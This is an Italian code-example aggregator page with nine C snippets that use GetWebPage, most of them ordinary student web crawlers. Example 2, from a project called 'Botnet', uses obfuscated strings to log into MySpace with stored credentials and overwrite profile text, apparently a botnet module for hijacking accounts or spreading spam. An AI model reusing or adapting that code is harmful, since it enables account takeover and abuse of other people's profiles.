Esempi in C++ (Cpp) per GetWebPage

Esempio n. 1

0

Mostra file

File: web.c Progetto: jiasal/search-engine

/*
 * TryGetWebPage - calls regular GetWebPage multiple times to retreive pages
 * when curl does not work the first time
 *
 * Returns 0 if the web page is not retreived after MAX_TRY attempts or
 * 1 if the page is successfully curled
 *
 */
int TryGetWebPage(WebPage* page) {
    if (GetWebPage(page) == 1) {
        sleep(INTERVAL_PER_FETCH);
        return 1;
    } else {
        for (int i = 1; i < MAX_TRY; i++) {
            sleep(INTERVAL_PER_FETCH);
            if (GetWebPage(page) == 1)
                return 1;
        }
        printf("Couldn't retreive the page of %s. "
                    "Skipping this page and crawling the next page.", page->url);
        return 0;
    }
}

Esempio n. 2

0

Mostra file

File: myspace.c Progetto: A-Massarella/Botnet

int 
MySpaceEdit
(struct myspace_d *myspace) {
    char buf[0x15F90],lpRequest[0x800],tmp[0x800];
    GetWebPage(buf,sizeof(buf),riddle_enc("���=|��prt=r~|"),
         riddle_enc("rwmn�7lov"),riddle_enc("JHW"),"",0x0); // www.myspace.com, index.cfm, GET
    LogToFile("tmp.html",buf,"w");
    sprintf(lpRequest,
         "__VIEWSTATE=%s&"
         "ctl00$Main$SplashDisplay$ctl00$Email_Textbox=%s&"
         "ctl00$Main$SplashDisplay$ctl00$Password_Textbox=%s",
         GetHashValue(buf,"__VIEWSTATE",'"',0x25),myspace->username,myspace->password);
    GetWebPage(buf,sizeof(buf),riddle_enc("�wu��w@���suw@u�"),
         riddle_enc("�����P���a����������_�����P�������"),riddle_enc("TSWX"),lpRequest,0x0); 
         // secure.myspace.com, index.cfm?fuseaction=login.process, POST
    LogToFile("afterlogin.html",buf,"w");
    if(strstr(buf,riddle_enc("z��An���Ac�Am�����Nj�A��A��Au���B"))) return(0x0); // You Must Be Logged-In to do That!
    strcpy(myspace->url,GetHashValue(buf,riddle_enc("���}��||{��E����xz|Ez��"),'"',0x18)); // profileedit.myspace.com
    GetWebPage(buf,sizeof(buf),riddle_enc("���}��||{��E����xz|Ez��"),
         myspace->url,riddle_enc("JHW"),"",0x0); // profileedit.myspace.com, GET
    sprintf(lpRequest,
         "__EVENTTARGET=&__EVENTARGUMENT=&"
         "__VIEWSTATE=%s&ctl00$ctl00$cpMain$ProfileEditContent$editInterests$hash=%s&"
         "ctl00$ctl00$cpMain$ProfileEditContent$editInterests$SaveTop=Save All Changes&"
         "ctl00$ctl00$cpMain$ProfileEditContent$editInterests$AboutMeTextBox=%s",
         GetHashValue(buf,"__VIEWSTATE",'"',0x25),GetHashValue(buf,"_hash",'"',0xE),myspace->editdata);
    strcpy(tmp,lpRequest);
    GetWebPage(buf,sizeof(buf),riddle_enc("���}��||{��E����xz|Ez��"),
         myspace->url,riddle_enc("JHW"),"",0x0); // profileedit.myspace.com, GET
    GetWebPage(buf,sizeof(buf),riddle_enc("���}��||{��E����xz|Ez��"),
         GetHashValue(buf,"name=\"aspnetForm\"",'"',0x29),riddle_enc("TSWX"),tmp,0x1); // profileedit.myspace.com, POST
    GetWebPage(NULL,0x0,"collect.myspace.com","index.cfm?fuseaction=signout","GET","",0x1);
    LogToFile("logoff.html",buf,"w");
    return(0x1);
}

Esempio n. 3

0

Mostra file

File: crawler.c Progetto: empotix/searchengine-1

void CrawlPage(WebPage webpage){
	char* nexturl= NULL;
	int lastpos = 0;
	int depth = webpage.depth + 1;
	
	if(depth > maxWebPageDepth) return;
	
	printf("\n\n[crawler]: Crawling - %s\n\n",webpage.url);
	
	while((lastpos = GetNextURL(webpage.html, lastpos, webpage.url, &nexturl))>0){
		NormalizeURL(nexturl);
		if(!CheckURL(nexturl)){
			// setup new page
			struct WebPage* newwebpage = (WebPage*)calloc(1,sizeof(WebPage));
			newwebpage->url = (char*)calloc(strlen(nexturl)+1, sizeof(char));
			strcpy(newwebpage->url,nexturl);
			newwebpage->depth = depth;
			
			// get new webpage
    		if(GetWebPage(newwebpage)){
    			if(HashTableInsert(nexturl)){											 // If not found in hash table, add to hash table
    				printf("[crawler]: Parser found new link - %s\n",nexturl);
    				struct ListNode* listentry = (ListNode*)calloc(1,sizeof(ListNode));							
    				listentry->page = newwebpage;									     // then add to list
					WebPageList->tail = InsertNode(WebPageList->tail,listentry);
					
	   				WriteFile(*newwebpage, filenum++); 									 // then write file
    			} else{
    				CleanUpPage(newwebpage);
    			}
			}
		}
		free(nexturl);
		nexturl = NULL;
		// Sleep for a second 
		sleep(INTERVAL_PER_FETCH);
	}
}

Esempio n. 4

0

Mostra file

File: crawler.c Progetto: pratapl/COSC50

int main(int argc, char* argv[])
{
    
    //Check for the number of arguments
    if(argc != 4){
	    printf("Invalid Input Argument\n");
	    printHelp();
        exit(1);
    } 
   
    //direcotry file path
    int dirSize = strlen(argv[2]);
    char dir[dirSize + 1];
    dir[0] = '\0';
    strcat(dir, argv[2]);

    int urlSize = strlen(argv[1]);
    char inputURL[urlSize + 1];
    inputURL[0] = '\0';
    strcat(inputURL, argv[1]);

    //Get the max depth number.
    int inputDepth = atoi(argv[3]);

    //Check if correct depth is provided.
    if(inputDepth > 4 || inputDepth < 0){
        printf("Invalid [depth]\n");
        printHelp();
        exit(1);
    }
    //Check for URL validity 
    if(!strstr(inputURL,URL_PREFIX)){
 	    printf("Invalid input [seed url]\n");
        printHelp();
	    exit(1);
    }
    //checkf for directory location validity
    DIR* directory = opendir(dir);
    if(directory){
	    closedir(directory);
    }
    else if(ENOENT == errno){
	    printf("Directory does not exist\n");
	    printHelp();
        exit(1);
    }
    else{
	    printf("Directory can't be opened\n");
        printHelp();
	    exit(1);
    }

    // init curl
    curl_global_init(CURL_GLOBAL_ALL);

    // setup seed page
    WebPage* seedWebPage = calloc(1, sizeof(WebPage));//Memory allocation for seed webpage
    seedWebPage->url = calloc((strlen(inputURL) + 1), sizeof(char));//Memory allocation to the seedURL
    seedWebPage->url[0] = '\0';
    strcat(seedWebPage->url, inputURL);
    seedWebPage->depth = 0;
    seedWebPage->html = NULL;
    
    //Initialize data structures
    HashTable* visitedURLHash = initHashTable();
    List* webPageList = initializeList();
    webPageList->head->page = seedWebPage;  
 
    //get seed webpage.
    if(GetWebPage(seedWebPage)){	
        // write seed file
        FILE *fPointer;
        char* pathVar1 = pathToDirectory(dir, fileNumber);
        fPointer = fopen(pathVar1, "w");
        free(pathVar1);	
        writeHTMLtoFile(fPointer, seedWebPage);
        //free(fPointer);
        
        if(inputDepth == 0){
            curl_global_cleanup();
            free(seedWebPage->html);
            free(seedWebPage->url);
            free(seedWebPage);

            //free webPageList and hashtable
            free(webPageList);
            for(int i = 0; i < MAX_HASH_SLOT; i++){
                free(visitedURLHash->table[i]->url);
                free(visitedURLHash->table[i]);
            }
            free(visitedURLHash);
            return 0;
        }   
        fileNumber += 1;
        depth += 1;
        HashTableInsert(visitedURLHash, seedWebPage->url); //mark as visited
        
        // extract urls from seed page
        char * result;
        int pos = 0;
        while((pos = GetNextURL(seedWebPage->html, pos, seedWebPage->url, &result))>0){

            if(NormalizeURL(result) && strstr(result,URL_PREFIX)){
                strtok(result, "#");
                //If not in hashtable, add it to the hashtable and add it to the webPageList.
                if(HashTableLookup(visitedURLHash, result) == 0){
                    HashTableInsert(visitedURLHash, result);
                    AppendList(webPageList, webPageInit(result, depth));
                    free(result);
                }
            }
        }
        if(webPageList->head->next->next == NULL){  //seed redirect case
            webPageList->head->next->page->depth = 0;
            fileNumber = 1;		
        }
        tempWebPage = PopList(webPageList); // Get rid of visited seedPage
    }
    else{	
        curl_global_cleanup();
        tempWebPage = PopList(webPageList);
        free(seedWebPage->html);
        free(seedWebPage->url);
        free(seedWebPage);
        //free(tempWebPage);
        free(webPageList);
        for(int i = 0; i < MAX_HASH_SLOT; i++){
            free(visitedURLHash->table[i]->url);
            free(visitedURLHash->table[i]);
        }
        free(visitedURLHash);
        exit(1);
    }

    
    //while there are urls to crawl
    while(webPageList->head != NULL && webPageList->tail != NULL){
        // get webpage for url
        tempWebPage = PopList(webPageList);
        if(GetWebPage(tempWebPage)){ 
            // write page file
            char* pathVar = pathToDirectory(dir, fileNumber);
            FILE *fPointer = fopen(pathVar, "w");
            free(pathVar);
            printf("Found link: %s\n",tempWebPage->url);
            writeHTMLtoFile(fPointer, tempWebPage);
            fileNumber += 1;
                
            if((tempWebPage->depth + 1) <= inputDepth ){
                char * resultTemp;
                int posTemp = 0;
                while((posTemp = GetNextURL(tempWebPage->html, posTemp, tempWebPage->url, &resultTemp))>0){
                    
                    if( NormalizeURL(resultTemp) && strstr(resultTemp,URL_PREFIX) ){
                        strtok(resultTemp, "#");
                        //insert to the hashtable and the webPageList if not already present
                        if(HashTableLookup(visitedURLHash, resultTemp) == 0){
                            HashTableInsert(visitedURLHash, resultTemp);
                            AppendList(webPageList, webPageInit(resultTemp, tempWebPage->depth+1));
                        }
                    }
                        free(resultTemp);
                }
            }
        
            free(tempWebPage->url);
            free(tempWebPage->html);
            free(tempWebPage);
        }
        else{
            free(tempWebPage->url);
            free(tempWebPage->html);
            free(tempWebPage);
        }
        sleep(INTERVAL_PER_FETCH);
    }
    // cleanup curl
    curl_global_cleanup();
    free(seedWebPage->url);
    free(seedWebPage->html);
    free(seedWebPage);
    free(webPageList);

    //free the hashtable
    for(int i = 0; i < MAX_HASH_SLOT; i++){
        if(visitedURLHash->table[i]->url != NULL){
            HashTableNode* currNode = visitedURLHash->table[i];
            while(currNode->next != NULL){
                HashTableNode* tempNode = currNode;
                currNode = currNode->next;
                free(tempNode->url);
                free(tempNode);
            }
            free(currNode->url);
            free(currNode);		
        }
        else{	
            free(visitedURLHash->table[i]);
        }
    }
    free(visitedURLHash);
    return 0;
}

Esempio n. 5

0

Mostra file

File: crawler.c Progetto: GrantAmann/TinySearchEngine

/* ========================================================================== */
int main(int argc, char* argv[]) {
  int filenum=1;
  int initdepth=1;
  // check command line arguments
  if (argcheck(argc,argv) == 1){
    exit(1);
  }

  char *starturl = argv[1];
  char *targetdir = argv[2];
  int depth = atoi(argv[3]);
  
  //initialize our hashtables and url list
  HashTable *myhashtable;
  List *mylist;
  myhashtable=initializeHashTable();
  mylist=initializelist();
  
  // init curl
  curl_global_init(CURL_GLOBAL_ALL);
  
  // setup seed page
  WebPage *startpage = createWebPage(starturl,0);

  // get seed webpage.  If the url is invalid, quit and send an error message.
  if ( GetWebPage(startpage) == 0 ){
    printf("The url that you entered was invalid.  Please try again.");
    free(startpage->html);
    free(startpage);
    exit(1);
  }
    
  // write seed file
  createfile(startpage,targetdir,filenum);
  filenum++;
  
  // add seed page to hashtable
  insertHashTable(myhashtable,startpage->url);

  // extract urls from seed page
  if( depth > 0 ){
    parseHTML(startpage,mylist,myhashtable,initdepth);
   }

  // while there are urls to crawl
  while ( mylist->head != NULL ){
    // get next url from list
    WebPage *nextpage = listpop(mylist);
    int currdepth = nextpage->depth;
 
   // get webpage for url
    // If the url is invalid, quit and free the memory
    if (GetWebPage(nextpage) != 0 ){
      createfile(nextpage,targetdir,filenum);
      filenum++;
      // extract urls from webpage
      if ( currdepth < depth ){
	parseHTML(nextpage, mylist, myhashtable, currdepth+1);
      }
    }
    free(nextpage->html);
    free(nextpage->url);
    free(nextpage);
    sleep(SLEEPTIME);
  }
  // cleanup curl
  free(startpage->html);
  free(startpage);
  freeHashTable(myhashtable);
  freelist(mylist);
  curl_global_cleanup();
  return 0;
}

Esempio n. 6

0

Mostra file

File: crawler.c Progetto: cjunmokim/Search-Engine

int main(int argc, char* argv[])
{
    // check command line arguments
	
	// Check that there are three input parameters.
	if (argc != 4) {
		printf("Please input three parameters: seed URL, directory, and max depth.\n");
		return 1;
	}
	
	// Check that the seed url has proper domain (old-www).
	if (strncmp(argv[1], URL_PREFIX, 15) != 0) {
		printf("The seed URL domain must be old-www.\n");
		return 1;
	}
	
	// Check that the directory already exists.
	struct stat st;
	if (stat(argv[2], &st) == 0 && S_ISDIR(st.st_mode));
	else { // If the directory does not exist, terminate the program.
		printf("The directory %s cannot be found. Please enter an existing directory.\n", argv[2]);
		return 1;
	}
	
	// Check that the directory path does not have a '/' at the end for ease in writing filenames.
	if (argv[2][strlen(argv[2]) - 1] == '/') {
		printf("Please do not add '/' at the end of the directory path.\n");
		return 1;
	}
	
	// Check the third argument.
	// Loop through each letter of the first argument and check that it is indeed a number.
	for (int i = 0; i < strlen(argv[3]); i++) {
		if (!isdigit((int)argv[3][i])) {
 			printf("Please input a valid number for the depth.\n");
   			return 1;
   		}
	}
   	
  	sscanf(argv[3], "%d", &depth); // Store the argument as an integer.
	
	// Check that the depth specified does not exceed max depth.
	if (depth > MAX) {
		printf("Search depth cannot exceed MAX depth of 4. Please enter a valid depth.\n");
		return 1;
	}
	
    	// init curl
    	curl_global_init(CURL_GLOBAL_ALL);

    	// setup seed page
	WebPage *page = calloc(1, sizeof(WebPage));
	page->url = (char *)malloc(strlen(argv[1]) + 1);
	MALLOC_CHECK(stderr, page->url); // Check that memory was allocated.
	strcpy(page->url, argv[1]); // Copy the seed url to page->url.

    	// get seed webpage
	if (!GetWebPage(page)) {
		printf("The seed URL is invald. Please enter a valid seed URL.\n");
		FreeWebMemory(page);
		return 1;
	}
	
	// Normalize the seed url.
	if (!NormalizeURL(page->url)) {
		printf("Seed URL cannot be normalized.\n");
		FreeWebMemory(page);
		return 1;
	}
	
    	// write seed file
    	strcpy(path, argv[2]); // Let var path contain the directory path.
    	WriteFile(page, path, pageID);
	
    	// add seed page to hashtable
    	if (!AddToHashTable(page->url)) {
		FreeWebMemory(page);
    		return 1;
   	 }
	
	// Initialize URLList.
	if (!InitList()) {
		FreeWebMemory(page);
		return 1;
	}
	
    	// extract urls from seed page
    	if (!CrawlPage(page)) {
    		FreeHashTable(); // Free all memory dynamically allocated to the hash table.
		FreeWebMemory(page);
    		return 1;
    	}

	// while there are urls to crawl
    	while (URLList.tail != NULL) {

    		// get next webpage from list
    		WebPage *next = PopList();

        	// write page file
        	pageID++;
		if (!WriteFile(next, argv[2], pageID)) { // Check that the WriteFile worked.
			FreeWebMemory(next);
			return 1;
		}

        	// extract urls from webpage and then cleanup.
    		CrawlPage(next);
		FreeWebMemory(next);
    	}
    	// Memory cleanup.
	FreeHashTable(); // Free memory dynamically allocated to the hash table.
	FreeWebMemory(page); // Free memory dynamically allocated to the Webpage variable.
	
    	// cleanup curl
    	curl_global_cleanup();
    
    	return 0;
}

Esempio n. 7

0

Mostra file

File: crawler.c Progetto: cjunmokim/Search-Engine

// Function to crawl a given webpage for links.
int CrawlPage(WebPage *wp) {
	
	char *result; // variable to hold the url.
    	int pos = 0; // position in each html page.
    	WebPage *newPage; // New webpage.
    
    	// Check that the depth does not exceed the depth passed.
    	if (wp->depth >= depth) {
    		return 0;
    	}
    
    	printf("\n");
    	printf("[crawler]: Crawling - %s\n", wp->url); // Print the url being curled.
    	printf("\n");
    
    	// Loop through each html page to get all its urls.
    	while ((pos = GetNextURL(wp->html, pos, wp->url, &result)) >= 0) {
    
    		// Check that the url has proper domain (old-www).
		if (strncmp(result, URL_PREFIX, strlen(URL_PREFIX)) != 0) {
			free(result);
			continue;
		}
 		
		// Normalize the url.
    		if (!NormalizeURL(result)) {
    			free(result);
    			continue;
    		}
    	
    		// Check that the url isn't already in the hash table.
    		if (!InHashTable(result)) {
    			AddToHashTable(result); // Add the url to the hash table.
    		
    			// Setup new page for each url.
			newPage = calloc(1, sizeof(WebPage));
			newPage->depth = wp->depth + 1;
			newPage->url = (char *)malloc(strlen(result) + 1);
			if (!newPage->url) { // Check that memory was allocated.
				continue;
			}
			strcpy(newPage->url, result);

			// Get html for each url.
			if (!GetWebPage(newPage)) {
				FreeWebMemory(newPage);
				free(result);
				continue;
			}
			
			printf("[crawler]: Parser found link - %s\n", result);
			
			// Add to the list of webpages to be visited.
			if (!AppendList(newPage)) {
				free(result);
				return 0;
			}
    		}
    		free(result);
    	}
	return 1;
}

Esempio n. 8

0

Mostra file

File: crawler.c Progetto: emilycgreene/Emily_Greene_Application

// main crawler function
int main(int argc, char* argv[]) {

    // local variables
    FILE *fp; // file pointer for html files
    char *nextURL; // pointer to the next URL found on the seed page
    char *newURL; // pointer to the next URL in the while loop

    // check command line arguments
    if (argc != 4) {
        printf("Incorrect number of arguments provided.");
        exit(1);
    }
    // check that the second argument is a directory
    stat(argv[2],&statbuffer);
    if S_ISDIR(statbuffer.st_mode) { }
    else {
        printf("Error, you did not supply a valid directory");
        exit(1);
    }

    // get arguments
    char *seedURL = argv[1];
    int filename_len = strlen(argv[2])+21;

    // get the directory
    char*filename = calloc(filename_len,sizeof(char));

    // check the maxDepth
    int value = is_numeric(argv[3]);
    if (value != 0) {
        sscanf(argv[3],"%i",&maxDepth);
    }
    else {
        printf("Error! maxDepth must be a number");
        exit(1);
    }

    // init curl
    curl_global_init(CURL_GLOBAL_ALL);

    // initialize data structures/variables

    // initialize hashtable
    HashTable *table = malloc(sizeof(HashTable));
    memset(table,0,MAX_HASH_SLOT);

    // initialize linked list
    List *WebPageList;
    WebPageList = createList();

    // setup seed page

    // get seed webpage
    // if it fails, report and exit
    if (NormalizeURL(seedURL) == 0) {
        printf("Error, bad URL");
        exit(1);
    }
    // write seed file

    // create WebPage object by allocating memory
    WebPage *seedPage = malloc(sizeof(WebPage));

    // assign values to each part of the struct
    seedPage->url = seedURL;
    seedPage->html = NULL;
    seedPage->html_len = 0;
    seedPage->depth = 0;

    // try to get the webpage up to MAX_TRY times
    if (!GetWebPage(seedPage)) {
        for (tries = 0; tries < MAX_TRY; tries++) {
            if (GetWebPage(seedPage)) {
                break;
            }
        }
    }

    // write html contents to a file "1" in the given directory
    sprintf(filename,"%s/%d",argv[2],1);
    fp = fopen(filename,"w");
    fputs(seedURL,fp);
    fputs("\n",fp);
    fprintf(fp,"%d\n",seedPage->depth);
    fputs(seedPage->html,fp);

    // close the file and wipe the filename
    fclose(fp);
    memset(filename,'\0',filename_len);

    // add seed page to hashtable
    add(table,seedURL);

    // extract urls from seed page

    // while there are still URLs in the seed page's html
    while ((pos = GetNextURL(seedPage->html,pos,seedPage->url,&nextURL)) > 0) {

        // only visiting them if it wouldn't exceed maxDepth
        if ((seedPage->depth+1) > maxDepth) {
            free(seedPage);
            exit(1);
        }

        // ensure it's a valid url
        if (NormalizeURL(nextURL) != 0) {

            // also check if its in the right domain
            if (strncmp(URL_PREFIX,nextURL,strlen(URL_PREFIX)) == 0) {

                // if it is added to the hashtable it is a unique URL that
                // hasn't been visited before, add it to the linked list
                // of URLs to visit
                if (add(table,nextURL)) {
                    // create a new webpage object
                    WebPage *pages = malloc(sizeof(WebPage));
                    pages->url = nextURL;
                    pages->html = NULL;
                    pages->html_len = 0;
                    pages->depth = 1;

                    // try to get the webpage up until the MAX_TRY
                    tries = 0;
                    if (!GetWebPage(pages)) {
                        for (tries = 0; tries < MAX_TRY; tries++) {
                            if (GetWebPage(pages)) {
                                break;
                            }
                        }
                    }

                    // add it to the linked list
                    addToEnd(WebPageList,pages);
                }
            }
        }
    }

    // while there are urls to crawl
    while (WebPageList->head != NULL) {
        // get next url from list
        WebPage *nextPage = malloc(sizeof(WebPage));
        nextPage = removeFromFront(WebPageList);

        // try to get the webpage up until the MAX_TRY
        tries = 0;
        if (!GetWebPage(nextPage)) {
            for (tries = 0; tries < MAX_TRY; tries++) {
                if (GetWebPage(nextPage)) {
                    break;
                }
            }
        }

        // write page file
        sprintf(filename,"%s/%d",argv[2],docNum);
        fp = fopen(filename,"w");
        fputs(nextPage->url,fp);
        fputs("\n",fp);
        fprintf(fp,"%d\n",nextPage->depth);
        fputs(nextPage->html,fp);

        // close the file and wipe the filename (to be used next time)
        fclose(fp);
        memset(filename,'\0',filename_len);

        // increment the doc num
        docNum++;

        // check if visiting the URLs on this page will exceed maxDepth
        if ((nextPage->depth+1) > maxDepth) {
            free(nextPage);
            continue;
        }
        pos = 0;
        // iterate through all the URLs on the page
        while ((pos = GetNextURL(nextPage->html,pos,nextPage->url,&newURL))>0) {
            // check to ensure that the URLs are the proper format
            if (NormalizeURL(newURL) != 0 ) {
                // check to ensure that they are in the right domain
                if (strncmp(URL_PREFIX,newURL,strlen(URL_PREFIX)) == 0) {
                    // making sure to only add new ones to the list
                    if (add(table,newURL) != 0) {
                        // create a new WebPage object
                        WebPage *page = malloc(sizeof(WebPage));
                        page->url = newURL;
                        page->html = NULL;
                        page->html_len = 0;
                        page->depth = nextPage->depth + 1;
                        GetWebPage(page);

                        // try to get the webpage up until the MAX_TRY
                        tries = 0;
                        if (!GetWebPage(page)) {
                            for (tries = 0; tries < MAX_TRY; tries++) {
                                if (GetWebPage(page)) {
                                    break;
                                }
                            }
                        }

                        // add the page to the linked list
                        addToEnd(WebPageList,page);
                    }
                }
            }
        }
        // Sleep for a bit to avoid annoying the target
        sleep(INTERVAL_PER_FETCH);

        // Free resources
        free(nextPage);

    }

    // cleanup curl
    curl_global_cleanup();

    // free resources
    // free hashtable
    hash = JenkinsHash(seedURL,MAX_HASH_SLOT);
    HashTableNode *freer = table->table[hash];
    HashTableNode *tempHash = NULL;
    while (freer != NULL) {
        tempHash = freer;
        freer = freer->next;
        free(tempHash);
    }
    free(table);

    // free linked list
    free(WebPageList);

    // free WebPage and filename pointer
    free(seedPage);
    free(filename);
    return 0;
}

Esempio n. 9

0

Mostra file

File: crawler.c Progetto: empotix/searchengine-1

int main(int argc, char* argv[])
{	
	filenum = 1;
	
    // check command line arguments
	if(argc != 4){		// check number of arguments
		fprintf(stderr,"Error: Number of input argument needs to be exactly 3\n");
		return -1;
	}else if (CheckDirectory(argv[2])){		// check if directory exist
		return -1;
	}else if(CheckDepth(argv[3])){			// check depth
		return -1;
	}else if(CheckURL(argv[1])){			// check url
		fprintf(stderr,"Error: Invalid URL. Can only crawl URL with URL prefix %s\n",URL_PREFIX);
		return -1;
	}
	
    // init curl
    curl_global_init(CURL_GLOBAL_ALL);

    // setup seed page
	seedPage = (WebPage*)calloc(1,sizeof(WebPage));
	NormalizeURL(seedURL);
    seedPage->url = (char*)calloc(strlen(seedURL)+1,sizeof(char));
	strcpy(seedPage->url,seedURL);
	seedPage->depth = 0;
	
    // get seed webpage
    if(!GetWebPage(seedPage)){				// clean up and exit if url is invalid
    	fprintf(stderr,"Error: Invalid URL\n");
		curl_global_cleanup();
		return -1;
	}

    // write seed file
	WriteFile(*seedPage, filenum++);
	
	// Exit if maxWebPageDepth = 0
	if(maxWebPageDepth == 0){				// clean up and exit if max webpage depth is 0
		printf("\n[crawler]: Crawling - %s\n\n",seedPage->url);
		printf("1 page has been crawled \n\n");
		CleanUpPage(seedPage);	
		CleanUpHash(URLsVisited);	
		curl_global_cleanup();
		return 0;
	}	
	
    // add seed page to hashtable
   	InitialiseHashTable(URLsVisited);
    HashTableInsert(seedURL);

    // add seed node to list
    WebPageList = (List*)calloc(1,sizeof(List));
    struct ListNode* seednode = (ListNode*)calloc(1,sizeof(ListNode));
    seednode->page = seedPage;
    WebPageList->head = seednode;
    WebPageList->tail = seednode;
    
    // extract urls from seed page
    CrawlPage(*seedPage);
    WebPageList->head = RemoveNode(WebPageList->head);
    
    // while there are urls to crawl
   	while(WebPageList->head != NULL && WebPageList->head->page->depth < maxWebPageDepth){
        // get next url from list, get webpage for url, write page file and extract urls from webpage
		CrawlPage(*(WebPageList->head->page));
		WebPageList->head = RemoveNode(WebPageList->head);
	}
	
	// cleanup memory
	CleanUpList(WebPageList);
	CleanUpHash(URLsVisited);

    // cleanup curl
    curl_global_cleanup();
	
	printf("\n\n %d webpages have been crawled\n\n", filenum-1);
    return 0;
}